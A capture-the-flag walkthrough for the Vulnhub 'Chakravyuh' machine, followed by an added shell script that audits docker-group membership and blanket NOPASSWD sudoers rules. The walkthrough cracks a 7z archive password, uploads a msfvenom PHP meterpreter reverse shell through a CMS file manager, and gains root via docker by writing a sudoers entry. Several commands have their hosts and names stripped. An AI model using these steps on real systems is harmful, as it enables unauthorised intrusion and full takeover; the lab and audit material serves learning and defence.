Vulnhub Chakravyuh Walkthrough

We start by scanning the host: nmap -A -T4 -p- -vv

Running dirb

There is an FTP service on port 65530 that allows login with the anonymous username

The file we’ve downloaded is password protected

We need to download a Python script called to extract the hash from the file and open it with John

python arjun.7z > hash.txt

The password is family, let’s open the file.

The file contains what looks like a Base64-encoded string, which we can decode using base64

gila is a directory name

Running dirb gave us now we log in with the email and the password princesa.

After we log in, there is a File Manager where we can upload a PHP shell; upload it to the tmp folder

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw -o shell.php

Now visit the link using also make sure to start Metasploit and start a session, or just open a listening port using nc -lvp 4444

Reading the group file, we can see that we are in the docker group; we can escalate from there.

Just run the following commands:

docker run --privileged --interactive --tty --volume /:/host bash

echo "www-data ALL=(ALL) NOPASSWD: ALL" > /host/etc/sudoers.d/foo

Now just read the final.txt
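
The escalation above works because www-data is a member of the docker group, which is root-equivalent on the host. The following audit script is an added example, not part of the original walkthrough: it lists docker group members, flags service accounts among them, and finds blanket NOPASSWD sudoers rules. The function names and the sample files (including the user alice and the docker GID 998) are constructed for illustration.

```shell
#!/bin/sh
# Audit for the misconfiguration used in this walkthrough: docker group
# membership is root-equivalent, so service accounts must not hold it.

# docker_group_members GROUP_FILE -> one member name per line
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" {
        n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i]
    }' "$1"
}

# risky_docker_members GROUP_FILE PASSWD_FILE -> "user:uid:shell" for members
# that are non-root service accounts (UID below 1000 or a nologin/false shell)
risky_docker_members() {
    docker_group_members "$1" | while read -r user; do
        awk -F: -v u="$user" \
            '$1 == u && $3 != 0 && ($3 < 1000 || $7 ~ /(nologin|false)$/) {
                print $1 ":" $3 ":" $7 }' "$2"
    done
}

# nopasswd_all_entries SUDOERS_DIR -> "file:line" for blanket NOPASSWD rules
nopasswd_all_entries() {
    grep -HE '^[^#].*NOPASSWD:[[:space:]]*ALL' "$1"/* 2>/dev/null
}

# Constructed sample data mirroring the state of the box after the steps above.
make_sample() {
    mkdir -p "$1/sudoers.d"
    printf '%s\n' 'root:x:0:' 'docker:x:998:www-data,alice' \
        'www-data:x:33:' > "$1/group"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin' \
        'alice:x:1000:1000::/home/alice:/bin/bash' > "$1/passwd"
    printf '%s\n' 'www-data ALL=(ALL) NOPASSWD: ALL' > "$1/sudoers.d/foo"
}

SAMPLE=$(mktemp -d)
make_sample "$SAMPLE"
echo "docker group members:"
docker_group_members "$SAMPLE/group"
echo "service accounts in docker group:"
risky_docker_members "$SAMPLE/group" "$SAMPLE/passwd"
echo "blanket NOPASSWD rules:"
nopasswd_all_entries "$SAMPLE/sudoers.d"
rm -rf "$SAMPLE"
```

On a real host, pass /etc/group, /etc/passwd and /etc/sudoers.d to the three functions instead of the sample directory.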
